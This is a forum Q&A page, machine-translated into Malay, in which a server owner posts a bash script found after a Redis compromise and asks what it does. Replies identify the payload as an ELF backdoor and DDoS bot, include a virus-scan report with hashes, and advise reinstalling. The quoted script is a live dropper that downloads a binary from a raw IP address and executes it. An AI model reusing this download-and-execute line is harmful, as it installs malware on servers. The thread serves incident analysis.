cari

Rumah  >  Soal Jawab  >  teks badan

linux - Apakah maksud kod penggodam ini?

Hari ini saya mendapati bahawa redis tidak dapat menyambung ke pelayan saya menemui arahan sedemikian pada pelayan

#!/bin/bash
zfile="/tmp/z.TF"

if [ ! -f "$zfile" ]; then  
    wget -P /tmp/ http://27.102.101.67/z.TF && chmod 777 /tmp/z.TF && /tmp/z.TF
fi

Memuat turun dan melaksanakan fail z.TF Apabila membuka z.TF, ia adalah kod bait Program ini boleh dilaksanakan semula secara automatik.

Pada masa ini, proses program ini dimatikan, tetapi perkhidmatan redis masih tidak tersedia. Saya tidak tahu sama ada terdapat program hasad lain.

Bolehkah seseorang menerangkan kandungan z.TF? Dan bagaimana untuk menanganinya.

ringa_leeringa_lee2850 hari yang lalu996

membalas semua(2)saya akan balas

  • 巴扎黑

    巴扎黑2017-06-07 09:26:08

    z.TF ialah fail boleh laku Linux dalam format ELF

    Pintu belakang telah dipasang pada pelayan anda Pasang semula sistem secepat mungkin untuk membetulkan kelemahan.
    Naik taraf semua yang perlu dinaik taraf.


    Pada asasnya ia adalah pintu belakang + ayam pedaging

    VirSCAN.org Scanned Report :
    Scanned time   : 2017-06-06 20:53:39
    Scanner results: 10%的杀软(4/39)报告发现病毒
    File Name      : z.TF
    File Size      : 649640 byte
    File Type      : application/x-executable
    MD5            : a6f42e73365ad56ce42985c5518d7e34
    SHA1           : 564d6e2c2489a6d3a9d0634f76e065be7ad28072
    Online report  : http://r.virscan.org/report/15f733f9dc3e27bbd06b92171710f0e4
    
    Scanner        Engine Ver      Sig Ver           Sig Date    Time   Scan result
    AVAST!         170303-1       4.7.4             2017-03-03     46   ELF:Ddostf-A                  
    SOPHOS         5.32           3.65.2            2016-10-10     8    Linux/DDoS-BE                 
    奇虎360         1.0.1          1.0.1             1.0.1          4    Win32/Backdoor.34d            
    江民杀毒         16.0.100       1.0.0.0           2017-06-05     2    Backdoor.Linux.wfg            

    balas
    0
  • 某草草

    某草草2017-06-07 09:26:08

    By the way, sila hantarkan saya kod t.ZF

    Tidakkah anda menerangkan kod yang anda siarkan dengan jelas?

    balas
    0
  • Batalbalas